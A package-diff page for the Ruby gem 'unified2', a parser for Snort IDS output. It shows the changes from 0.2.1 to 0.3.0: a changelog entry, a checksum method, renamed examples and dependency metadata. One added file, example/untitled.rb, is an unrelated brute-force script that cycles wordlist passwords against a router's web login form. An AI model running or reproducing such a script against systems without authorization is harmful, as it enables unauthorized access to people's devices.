RubyGems - unified2 - Versions diffs - 0.2.1 → 0.3.0 - Mend

unified2 0.2.1 → 0.3.0

Files changed (9) hide show

data/ChangeLog.rdoc +6 -1
data/README.rdoc +4 -3
data/example/basic-example.rb +27 -0
data/example/{example.rb → mysql-example.rb} +2 -2
data/example/untitled.rb +31 -0
data/gemspec.yml +1 -0
data/lib/unified2/event.rb +8 -2
data/lib/unified2/version.rb +1 -1
metadata +26 -13

data/ChangeLog.rdoc CHANGED Viewed

@@ -1,4 +1,9 @@
-=== 0.2.1 / 2011-03-09
+=== 0.3.0 / 2011-03-14
+* Added checksum support for event objects
+* Fixed example signature filename typo
+=== 0.2.1 / 2011-03-15
 * minor bug fixes and typos

data/README.rdoc CHANGED Viewed

@@ -18,6 +18,7 @@ A ruby interface for unified2 output. rUnified2 allows you to manipulate unified
  require 'unified2'
  # load rules into memory
  Unified2.configuration do
   # Sensor Configurations
   sensor :id => 1, :name => 'Test Sensor', :interface => 'en1'
@@ -30,15 +31,15 @@ A ruby interface for unified2 output. rUnified2 allows you to manipulate unified
  # Unified2#watch
  # Watch a unified2 file for changes and process the results.
  Unified2.watch('/var/log/snort/merged.log', :last) do |event|
   next if event.signature.name.blank?
-	puts event
+  puts event
  end
  # Unified2#read
  # Parse a unified2 file and process the results.
  Unified2.read('/var/log/snort/merged.log') do |event|
   puts "#{event.id} | #{event.ip_destination} | #{event.ip_source} | #{event.signature.name}"
  end

data/example/basic-example.rb ADDED Viewed

@@ -0,0 +1,27 @@
+$:.unshift File.join(File.dirname(__FILE__), "..", "lib")
+require 'unified2'
+require 'pp'
+# Unified2 Configuration
+Unified2.configuration do
+  # Sensor Configurations
+  sensor :interface => 'en1', :name => 'Example Sensor'
+  # Load signatures, generators & classifications into memory
+  load :signatures, 'seeds/sid-msg.map'
+  load :generators, 'seeds/gen-msg.map'
+  load :classifications, 'seeds/classification.config'
+end
+# Monitor the unfied2 log and process the data.
+# The second argument is the last event processed by
+# the sensor. If the last_event_id column is blank in the
+# sensor table it will begin at the first available event.
+Unified2.watch('/var/log/snort/merged.log', :first) do |event|
+  next if event.signature.blank?
+  puts event.checksum # => 66302273aa2f181d0310aa789027bac3ce1efb4f
+end

data/example/{example.rb → mysql-example.rb} RENAMED Viewed

@@ -15,7 +15,7 @@ Unified2.configuration do
   sensor :interface => 'en1', :name => 'Example Sensor'
   # Load signatures, generators & classifications into memory
-  load :signatures, 'seeds/d'
+  load :signatures, 'seeds/sid-msg.map'
   load :generators, 'seeds/gen-msg.map'
   load :classifications, 'seeds/classification.config'
@@ -45,7 +45,7 @@ end
 Unified2.watch('/var/log/snort/merged.log', sensor.last_event_id + 1 || :first) do |event|
   next if event.signature.blank?
-  #puts event
+  puts event
   insert_event = Event.new({
                        :event_id => event.id,

data/example/untitled.rb ADDED Viewed

@@ -0,0 +1,31 @@
+#!/usr/bin/env ruby
+#
+# http://192.168.1.254/xslt?PAGE=A06&THISPAGE=&NEXTPAGE=A06
+@file = File.open('/Users/mephux/Source/passwords/wpa.txt')
+require 'rubygems'
+require 'mechanize'
+a = Mechanize.new
+a.get('http://192.168.1.254/xslt?PAGE=A06&THISPAGE=&NEXTPAGE=A06') do |page|
+  @file.each_line do |password|
+    next unless password[/^e/]
+    puts password
+    login_form = page.form_with(:action => '/xslt', :method => 'POST')
+    login_form['PASSWORD'] = password
+    page = a.submit login_form
+    if page.body =~ /The password is incorrect./
+      puts 'FAIL'
+    else
+      puts 'W0ots'
+      puts password
+      exit -1
+    end
+  end
+end

data/gemspec.yml CHANGED Viewed

@@ -7,6 +7,7 @@ email: dustin.webber@gmail.com
 homepage: https://github.com/mephux/unified2
 dependencies:
+  gibbler: ~> 0.8.9
   bindata: ~> 1.3.1
   hexdump: ~> 0.1.0

data/lib/unified2/event.rb CHANGED Viewed

@@ -1,3 +1,4 @@
+require 'gibbler'
 require 'ipaddr'
 require 'json'
 require 'unified2/classification'
@@ -6,9 +7,10 @@ require 'unified2/sensor'
 require 'unified2/signature'
 module Unified2
   class Event
+    include Gibbler::Complex
     attr_accessor :id, :metadata, :packet
     def initialize(id)
@@ -22,6 +24,10 @@ module Unified2
       end
     end
+    def checksum
+      gibbler
+    end
     def uid
       "#{sensor.id}.#{@id}"
     end

data/lib/unified2/version.rb CHANGED Viewed

@@ -1,4 +1,4 @@
 module Unified2
   # unified2 version
-  VERSION = "0.2.1"
+  VERSION = "0.3.0"
 end

metadata CHANGED Viewed

@@ -2,7 +2,7 @@
 name: unified2
 version: !ruby/object:Gem::Version
   prerelease:
-  version: 0.2.1
+  version: 0.3.0
 platform: ruby
 authors:
 - Dustin Willis Webber
@@ -10,64 +10,75 @@ autorequire:
 bindir: bin
 cert_chain: []
-date: 2011-03-13 00:00:00 -05:00
+date: 2011-03-14 00:00:00 -04:00
 default_executable:
 dependencies:
 - !ruby/object:Gem::Dependency
-  name: bindata
+  name: gibbler
   prerelease: false
   requirement: &id001 !ruby/object:Gem::Requirement
     none: false
     requirements:
     - - ~>
       - !ruby/object:Gem::Version
-        version: 1.3.1
+        version: 0.8.9
   type: :runtime
   version_requirements: *id001
 - !ruby/object:Gem::Dependency
-  name: hexdump
+  name: bindata
   prerelease: false
   requirement: &id002 !ruby/object:Gem::Requirement
     none: false
     requirements:
     - - ~>
       - !ruby/object:Gem::Version
-        version: 0.1.0
+        version: 1.3.1
   type: :runtime
   version_requirements: *id002
 - !ruby/object:Gem::Dependency
-  name: ore-tasks
+  name: hexdump
   prerelease: false
   requirement: &id003 !ruby/object:Gem::Requirement
+    none: false
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: 0.1.0
+  type: :runtime
+  version_requirements: *id003
+- !ruby/object:Gem::Dependency
+  name: ore-tasks
+  prerelease: false
+  requirement: &id004 !ruby/object:Gem::Requirement
     none: false
     requirements:
     - - ~>
       - !ruby/object:Gem::Version
         version: "0.4"
   type: :development
-  version_requirements: *id003
+  version_requirements: *id004
 - !ruby/object:Gem::Dependency
   name: rspec
   prerelease: false
-  requirement: &id004 !ruby/object:Gem::Requirement
+  requirement: &id005 !ruby/object:Gem::Requirement
     none: false
     requirements:
     - - ~>
       - !ruby/object:Gem::Version
         version: "2.4"
   type: :development
-  version_requirements: *id004
+  version_requirements: *id005
 - !ruby/object:Gem::Dependency
   name: yard
   prerelease: false
-  requirement: &id005 !ruby/object:Gem::Requirement
+  requirement: &id006 !ruby/object:Gem::Requirement
     none: false
     requirements:
     - - ~>
       - !ruby/object:Gem::Version
         version: 0.6.0
   type: :development
-  version_requirements: *id005
+  version_requirements: *id006
 description: A ruby interface for unified2 output. rUnified2 allows you to manipulate unified2 output for custom storage and/or analysis.
 email:
 - dustin.webber@gmail.com
@@ -87,14 +98,16 @@ files:
 - LICENSE.txt
 - README.rdoc
 - Rakefile
+- example/basic-example.rb
 - example/connect.rb
-- example/example.rb
 - example/models.rb
+- example/mysql-example.rb
 - example/search.rb
 - example/seeds/classification.config
 - example/seeds/gen-msg.map
 - example/seeds/sid-msg.map
 - example/seeds/unified2
+- example/untitled.rb
 - gemspec.yml
 - lib/unified2.rb
 - lib/unified2/classification.rb